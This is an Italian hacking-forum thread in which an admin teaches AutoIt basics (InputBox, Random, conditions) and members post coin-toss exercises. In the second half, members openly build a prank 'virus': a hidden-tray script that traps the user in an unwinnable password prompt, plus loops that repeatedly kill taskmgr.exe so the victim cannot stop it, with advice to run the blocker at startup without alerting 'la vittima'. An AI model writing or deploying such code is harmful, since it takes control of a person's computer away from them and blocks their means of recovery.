Xhack

Un forum dedicato all'hacking
 
IndiceIndice  PortalePortale  CalendarioCalendario  FAQFAQ  CercaCerca  RegistratiRegistrati  Lista UtentiLista Utenti  GruppiGruppi  Accedi  

Condividi | 
 

 tutorial 2

Andare in basso 
Vai alla pagina : 1, 2  Seguente
AutoreMessaggio
darkjoker
Admin
Admin
avatar

Numero di messaggi : 813
Data d'iscrizione : 30.07.07

MessaggioTitolo: tutorial 2   Lun Lug 30, 2007 6:48 pm

Ciao, in questo tutorial vi spiegherò alcune funzioni di autoit3, che potete trovare nella sezione download.
In un precedente tutorial vi ho illustrato come utilizzare il ciclo while, l'utilizzo delle condizioni con if e la
dichiarazione e l'uso delle variabili.
Ora vorrei insegnarvi a ricevere dati inseribili in una casella (comunemente chiamata input)
Per creare questo tipo di finestre basta questo comando:
Codice:
Inputbox ("titolo", "testo")
Qualunque valore inseriamo nella input il programma si chiuderà.
Proviamo ora a creare una inputbox che richiede una password, se essa è corretta da una messagebox di
congratulazioni, altrimenti una di errore (per fare ciò dobbiamo usare le condizioni):
Codice:
$pass = inputbox ("password", "Inserire password:", "", "*")
if $pass = "password" then
msgobx (4096, "bravo", "password corretta")
else
msgbox (4096, "errore", "password errata")
endif
Avrete notato che in questo caso la variabile viene assegnata a un comado e il suo valore (della variabile) sarà
uguale al testo inserito nella input.
Oltre a titolo e testo ho aggiunto anche questo pezzo: "", "*". "" E' ciò che troveremo prescritto dentro la input, in
questo caso non ci sarà niente e non due doppie virgolette, infatti il testo va inserito all'interno delle virgolette. "*":
il carattere racchiuso tra le virgolette è il simbolo, numero o lettera dietro la quale tutti i caratteri inseriti verranno
nascosti, in questo caso saranno nascosti da asterischi.
Dopodichè verrà controllato se il valore della input ($pass) è uguale al valore preimpostato (in questo caso
password), se abbiamo inserito password correttamente vedremo una messaebox di congratulazioni, altrimenti
una di errore. Traduciamo il testo dello script in italiano
viene richiesta una password
se la password inserita è uguale alla parola password allora
crea una messagebox di login riuscito
altrimenti
crea una messagebox di errore
fine della condizione if.
Tutto chiaro?
Molto bene. Ora vi spiegherò un altro comando:
Il random
Questo comando permette di generare un numero a caso:
Codice:
random (1, 100)
Questo script genererà un numero compreso tra 1 e 100. Proviamo ora a mostrare il valore ottenuto:
Codice:
$ran = random (1, 100)
msgbox (4096, "titolo", $ran)
Tutta roba già vista vero? In pochissime parole genera un numero tra 1 e 100 e poi lo mostra nell'area del testo
della messagebox.
Ora vi chiedo, per esercitarvi su queste due nuove funzioni, di creare una inputbox che chiede di inserire testa (0)
o croce (1), a questo punto enerate un numero a caso tra 1 e 2 e con le condizioni if verificate se si ha vinto o
perso con due relative messagebox. Questo esercizio potrà essere difficile per chi si è appena avvicinato al
mondo della programmazione, inviateci lo stesso i vostri risultati a xhacking@yahoo.it e se avete dubbi non
dubitate a chiedere sul forum nella sezione autoit. Se avete trovato qualche comando di autoit che non avete
capito non esitate a postare nella sessione sopra citata.
Ora dovreste conoscere più o meno le funzioni di base di autoit, leggete ancora i tutorial per creare virus (per lo
scopo educativo dal punto di vista della programmazione) e potrete comiciare a programmare da soli... il vostro
migliore amico sarà l'help file dove troverete tutti i comandi spiegati passo a passo e con uno script di esempio
per ciascuno di essi.
Buona programmazione!!!
darkjoker


Ultima modifica di il Gio Ago 23, 2007 7:12 pm, modificato 1 volta
Torna in alto Andare in basso
Visualizza il profilo dell'utente
giozh°_°
Moderatore
Moderatore
avatar

Numero di messaggi : 156
Data d'iscrizione : 18.08.07

MessaggioTitolo: Re: tutorial 2   Lun Ago 20, 2007 2:30 pm

variabili
a= testa o croce utente
cont=contatore
vitt=numero vittorie
sconf=numero sconfitte
ran=numeri random
questo testa e corce fa 3 partite e poi comunica il risultato (almeno spero)

Codice:
$a=inputbox ("testa o corce????","inserisci 1 (corce) oppure 0(zero)(testa")
$cont=3
while
$cont !=0  ;spero che esista il diverso su auutoit
$ran=random(0,1)
if
$a=$ran
$vitt=$vitt+1
msgbox(4096,"testa o croce????","hai vinto tu!")
else
$sconf=$sconf+1
msgbox(4096,"testa o croce????","ha vinto il computer...")
$cont=$cont-1
wend
if
$vitt>$sconf
msgbox(4096,"testa o croce????","hai vinto $vitt a $ sconf")
else
msgbox(4096,"testa o croce????","hai perso $sconf a $vitt...")
Torna in alto Andare in basso
Visualizza il profilo dell'utente
darkjoker
Admin
Admin
avatar

Numero di messaggi : 813
Data d'iscrizione : 30.07.07

MessaggioTitolo: Re: tutorial 2   Lun Ago 20, 2007 7:02 pm

perfetto, solo che tu, abituato al c++ hai fatto cosi:
Citazione :

????","hai vinto $vitt a $ sconf")

invece con autoit bisogna fare:

Codice:

hai vinto"&$vitt&"a"&$sconf&")

il simbolo & serve per il concatenamento, come il + in python

_________________
L'unico computer sicuro, è un computer spento.

Nel software esiste sempre almeno un bug, generalmente è localizzabile tra la tastiera e la sedia

Torna in alto Andare in basso
Visualizza il profilo dell'utente
giozh°_°
Moderatore
Moderatore
avatar

Numero di messaggi : 156
Data d'iscrizione : 18.08.07

MessaggioTitolo: Re: tutorial 2   Mar Ago 21, 2007 1:12 am

babbene!! comunque il principio era quello!
Torna in alto Andare in basso
Visualizza il profilo dell'utente
darkjoker
Admin
Admin
avatar

Numero di messaggi : 813
Data d'iscrizione : 30.07.07

MessaggioTitolo: Re: tutorial 2   Mar Ago 21, 2007 6:48 pm

certamente, solo che se qualcuno (che non conosce autoit) analizza il tuo script poi continuerà a sbagliare, comunque complimenti

_________________
L'unico computer sicuro, è un computer spento.

Nel software esiste sempre almeno un bug, generalmente è localizzabile tra la tastiera e la sedia

Torna in alto Andare in basso
Visualizza il profilo dell'utente
darkphantom
hack-member
hack-member
avatar

Numero di messaggi : 398
Data d'iscrizione : 03.09.07

MessaggioTitolo: Re: tutorial 2   Gio Set 06, 2007 2:46 pm

ecco uno script per fare testa o croce alle terze col computer ( mi sono ispirato all'idea di giozh) ke ne dite?

Codice:

$c = 0
$v = 0
$p = 0
While $c < 3
   $a = Random(0, 1, 1)
                    $b = InputBox("Testa o croce?", "Scrivi testa oppure croce e premi OK")
          If $b = "testa" Then
   If $a = 0 Then
      MsgBox(4096, "", "Hai vinto!!!")
      $c = $c+1
      $v = $v+1
   Else
      MsgBox(4096, "", "Hai perso!!!")
      $c = $c+1
      $p = $p+1
   EndIf
ElseIf $b = "croce" Then
   If $a = 1 Then
      MsgBox(4096, "", "Hai vinto!!!")
      $c = $c+1
      $v = $v+1
   Else
      MsgBox(4096, "", "Hai perso!!!")
      $c = $c+1
      $p = $p+1
   EndIf
EndIf
WEnd
If $c = 3 Then
   If $v > $p Then
      MsgBox(4096, "", "Hai vinto tu!!!")
   Else
      MsgBox(4096, "", "Ha vinto il computer!!!")
   EndIf
EndIf
Torna in alto Andare in basso
Visualizza il profilo dell'utente
darkjoker
Admin
Admin
avatar

Numero di messaggi : 813
Data d'iscrizione : 30.07.07

MessaggioTitolo: Re: tutorial 2   Gio Set 06, 2007 6:30 pm

perfetto, ma hai aggiunto una cosa inutile...
Codice:

If $c = 3 Then

tu hai aggiunto questo pezzo ma non serve perche se hai fatto
Codice:

while $c < 3

quindi in ogni caso uscirà dal ciclo ed eseguirà quello che c'è dopo.
lo script funziona comunque, molto bravo Very Happy !!!

_________________
L'unico computer sicuro, è un computer spento.

Nel software esiste sempre almeno un bug, generalmente è localizzabile tra la tastiera e la sedia

Torna in alto Andare in basso
Visualizza il profilo dell'utente
darkphantom
hack-member
hack-member
avatar

Numero di messaggi : 398
Data d'iscrizione : 03.09.07

MessaggioTitolo: Re: tutorial 2   Ven Set 07, 2007 5:07 pm

hai ragione grazie del consiglio Very Happy
Torna in alto Andare in basso
Visualizza il profilo dell'utente
darkphantom
hack-member
hack-member
avatar

Numero di messaggi : 398
Data d'iscrizione : 03.09.07

MessaggioTitolo: Re: tutorial 2   Sab Set 08, 2007 8:29 pm

ho creato un virus ke genera un numero da 1 a 999: cambia ogni volta e, se non la si azzecca, non si esce. ke ne dite?

Codice:

#NoTrayIcon
$a = 0
While $a = 0
   $b = Random(1, 999, 1)
   $c = InputBox(" ", "La password è un numero compreso tra 1 e 999:prova a indovinarla")
   If $b = $c Then
      MsgBox(4096, " ", "Bravissimo, è quella la password!!!")
      $a = $a + 1
   Else
      MsgBox(4096, " ", "Hai sbagliato e, finchè non indovinerai, non potrai uscire!!!")
      MsgBox(4096, " ", "Ah, dimenticavo, la password cambia ogni volta!!!")
   EndIf
WEnd
Torna in alto Andare in basso
Visualizza il profilo dell'utente
giga hertz
apprendista
apprendista


Numero di messaggi : 42
Data d'iscrizione : 01.09.07

MessaggioTitolo: virus   Dom Set 09, 2007 9:31 pm

basta premere ctrl+alt+canc eliminare il processo e addio virus
Torna in alto Andare in basso
Visualizza il profilo dell'utente
certaindeath
Admin
Admin
avatar

Numero di messaggi : 343
Data d'iscrizione : 30.07.07

MessaggioTitolo: Re: tutorial 2   Lun Set 10, 2007 6:35 pm

Si hai ragione,
si può bloccare in questo modo
Codice:

While 1
    If  ProcessExists("taskmgr.exe") Then
        ProcessClose("taskmgr.exe")
    EndIf
WEnd
semlice, no?
Torna in alto Andare in basso
Visualizza il profilo dell'utente
darkjoker
Admin
Admin
avatar

Numero di messaggi : 813
Data d'iscrizione : 30.07.07

MessaggioTitolo: Re: tutorial 2   Mer Set 12, 2007 4:27 pm

scusa, certai, ma ti devo contraddire...
se tu metti prima questo
Codice:
While 1
    If  ProcessExists("taskmgr.exe") Then
        ProcessClose("taskmgr.exe")
    EndIf
WEnd
e poi questo
Codice:
#NoTrayIcon
$a = 0
While $a = 0
  $b = Random(1, 999, 1)
  $c = InputBox(" ", "La password è un numero compreso tra 1 e 999:prova a indovinarla")
  If $b = $c Then
      MsgBox(4096, " ", "Bravissimo, è quella la password!!!")
      $a = $a + 1
  Else
      MsgBox(4096, " ", "Hai sbagliato e, finchè non indovinerai, non potrai uscire!!!")
      MsgBox(4096, " ", "Ah, dimenticavo, la password cambia ogni volta!!!")
  EndIf
WEnd
il prog continuerà a controllare il processo del task, mentre se includi il while all'interno dell'altro while, cosi:
Codice:
#NoTrayIcon
$a = 0
While $a = 0
  If  ProcessExists("taskmgr.exe") Then
        ProcessClose("taskmgr.exe")
    EndIf
  $b = Random(1, 999, 1)
  $c = InputBox(" ", "La password è un numero compreso tra 1 e 999:prova a indovinarla")
  If $b = $c Then
      MsgBox(4096, " ", "Bravissimo, è quella la password!!!")
      $a = $a + 1
  Else
      MsgBox(4096, " ", "Hai sbagliato e, finchè non indovinerai, non potrai uscire!!!")
      MsgBox(4096, " ", "Ah, dimenticavo, la password cambia ogni volta!!!")
  EndIf
WEnd
il prog controllerà all'inizio se c'e il task aperto e poi eseguirà lo script, quindi durante la richiesta di password uno puo semplicemente premere il task.
stessa cosa se il processclose lo metti alla fine o al centro, ci sarà sempre un momento in cui non è coperto dal blocco del task, si puo usare qualche exitloop, continueloop per interrompere o riprendere i cicli, ma rimarrebbe comunque qualche momento non coperto... adesso vedo se si puo fare qualcosa di piu... study

_________________
L'unico computer sicuro, è un computer spento.

Nel software esiste sempre almeno un bug, generalmente è localizzabile tra la tastiera e la sedia

Torna in alto Andare in basso
Visualizza il profilo dell'utente
certaindeath
Admin
Admin
avatar

Numero di messaggi : 343
Data d'iscrizione : 30.07.07

MessaggioTitolo: Re: tutorial 2   Mer Set 12, 2007 4:35 pm

Certo, lo sapevo.
Questo codice va messo in un programma a parte.
è chiaro che un ciclo while infinito(while 1 = 1) blocca l'esecuzione di uno script
(qualsiasi istruzione sia inserita dopo il ciclo while non verrà mai eseguita, a meno che non si inserisca l'istruzione Exit loop)
Torna in alto Andare in basso
Visualizza il profilo dell'utente
darkphantom
hack-member
hack-member
avatar

Numero di messaggi : 398
Data d'iscrizione : 03.09.07

MessaggioTitolo: Re: tutorial 2   Mar Set 18, 2007 7:51 pm

hei, darkjoker, in autoit esiste il segno diverso? ( per esempio != o qualcosa di simile)
grazie tante Wink
Torna in alto Andare in basso
Visualizza il profilo dell'utente
giga hertz
apprendista
apprendista


Numero di messaggi : 42
Data d'iscrizione : 01.09.07

MessaggioTitolo: Re: tutorial 2   Mer Set 19, 2007 2:42 pm

per non far aprire il task dovremmo fare un spece di anti virus che funziona in continuazione ma apposto di toglierli i virus li consente
Torna in alto Andare in basso
Visualizza il profilo dell'utente
darkjoker
Admin
Admin
avatar

Numero di messaggi : 813
Data d'iscrizione : 30.07.07

MessaggioTitolo: Re: tutorial 2   Mer Set 19, 2007 5:17 pm

Citazione :
hei, darkjoker, in autoit esiste il segno diverso? ( per esempio != o qualcosa di simile)
grazie tante

si, ci dovrebbe essere !=

per quanto rigurda l'antivirus zi dovrebbe fare qualcosa tipo:

Codice:

while 1 = 1
    if processexist ('nomevirus.exe') then
          while 1 = 1
              processclose ('taskmgr.exe')
          wend
    endif
wend

in questo modo se il processo nomevirus.exe esiste ( l'ho aggiunto per non far insspettire la vittima (si puo anche non fare ma giusto per abbelire lo script Very Happy) comunque, chiude solo taskmanager e cosi tutti i virus vissero per sempre felici e contenti...

ps: magari poi mettetelo all'avvio...

_________________
L'unico computer sicuro, è un computer spento.

Nel software esiste sempre almeno un bug, generalmente è localizzabile tra la tastiera e la sedia

Torna in alto Andare in basso
Visualizza il profilo dell'utente
darkphantom
hack-member
hack-member
avatar

Numero di messaggi : 398
Data d'iscrizione : 03.09.07

MessaggioTitolo: Re: tutorial 2   Mer Set 19, 2007 7:07 pm

grazie, ma in realtà si usa <>, ma l'ha detto poco fa certaindeath. grazie comunque
Torna in alto Andare in basso
Visualizza il profilo dell'utente
darkjoker
Admin
Admin
avatar

Numero di messaggi : 813
Data d'iscrizione : 30.07.07

MessaggioTitolo: Re: tutorial 2   Mer Set 19, 2007 7:09 pm

eh eh, hai ragione... e dire che non ci ho neanche pensato... lo uso sempre...

_________________
L'unico computer sicuro, è un computer spento.

Nel software esiste sempre almeno un bug, generalmente è localizzabile tra la tastiera e la sedia

Torna in alto Andare in basso
Visualizza il profilo dell'utente
AthanatiEste
apprendista
apprendista


Numero di messaggi : 15
Data d'iscrizione : 19.09.07

MessaggioTitolo: Re: tutorial 2   Dom Set 23, 2007 7:44 pm

VOrrei chiedere una cosa,qndo uso lo sript che genera un numero tra 1 e 100, mi genere per esempio il numero 17 2928304084 (+ altre 7 o 8 cifre che sarebbero i decimali).Come posso evitarlo se posso evitarlo??
Torna in alto Andare in basso
Visualizza il profilo dell'utente
darkjoker
Admin
Admin
avatar

Numero di messaggi : 813
Data d'iscrizione : 30.07.07

MessaggioTitolo: Re: tutorial 2   Lun Set 24, 2007 5:13 pm

devi fare:
Codice:

random (1, 100, 1)
l'ultima cifra è la flag che inposta la modalita di generazione di numeri interi...

_________________
L'unico computer sicuro, è un computer spento.

Nel software esiste sempre almeno un bug, generalmente è localizzabile tra la tastiera e la sedia

Torna in alto Andare in basso
Visualizza il profilo dell'utente
AthanatiEste
apprendista
apprendista


Numero di messaggi : 15
Data d'iscrizione : 19.09.07

MessaggioTitolo: Re: tutorial 2   Lun Set 24, 2007 5:45 pm

grazie,cmq trovo molto ma molto complicato questo esercizio di testa e croce.
Torna in alto Andare in basso
Visualizza il profilo dell'utente
defender
apprendista
apprendista
avatar

Numero di messaggi : 8
Età : 25
Data d'iscrizione : 28.11.07

MessaggioTitolo: Re: tutorial 2   Dom Dic 02, 2007 5:01 pm

io invece ho utilizzato questo metodo:

$answer = inputbox("testa o croce?", "inserisci testa o croce")
if $answer = "testa" Then
$ran = random (1, 3)
msgbox (4096, "titolo", $ran)
if $ran < 1.5 Then
msgbox(4096, "vittoria", "hai vinto")
Else
msgbox(4096, "sconfitta", "hai perso")
EndIf
EndIf
if $answer = "croce" Then
$ran = random (1, 3)
msgbox (4, "titolo", $ran)
if $ran > 1.5 Then
msgbox(4096, "vittoria", "hai vinto")
Else
msgbox(4096, "sconfitta", "hai perso")
EndIf
EndIf
Torna in alto Andare in basso
Visualizza il profilo dell'utente
black hole
membro
membro
avatar

Numero di messaggi : 90
Data d'iscrizione : 03.10.07

MessaggioTitolo: Re: tutorial 2   Mar Dic 04, 2007 4:25 pm

l'unica cosa che non ho capito del tuo codice è perchè hai messo la msgbox che dice che numero ha scelto il random...
Torna in alto Andare in basso
Visualizza il profilo dell'utente
darkphantom
hack-member
hack-member
avatar

Numero di messaggi : 398
Data d'iscrizione : 03.09.07

MessaggioTitolo: Re: tutorial 2   Mer Dic 05, 2007 6:35 pm

mah... i misteri della vita...
Torna in alto Andare in basso
Visualizza il profilo dell'utente
certaindeath
Admin
Admin
avatar

Numero di messaggi : 343
Data d'iscrizione : 30.07.07

MessaggioTitolo: Re: tutorial 2   Mer Dic 05, 2007 6:40 pm

beh, alla fine quello che importa è se hai vinto o perso....
Torna in alto Andare in basso
Visualizza il profilo dell'utente
Contenuto sponsorizzato




MessaggioTitolo: Re: tutorial 2   

Torna in alto Andare in basso
 
tutorial 2
Torna in alto 
Pagina 1 di 2Vai alla pagina : 1, 2  Seguente
 Argomenti simili
-
» Come installare una mappa su Minecraft
» 1° video-tutorial sul C++: Come installare Code::Blocks
» Trucco per far cambiare idea ad un tuo amico prima di invaderti su Empires And Allies.
» Come permettere la visione dei video Youtube sui telefonini - Tutorial
» Codice - Tutorial Arduino Base #9 Accendere une LED con pulsante

Permessi di questa sezione del forum:Non puoi rispondere agli argomenti in questo forum
Xhack :: Programmazione :: Autoit-
Andare verso: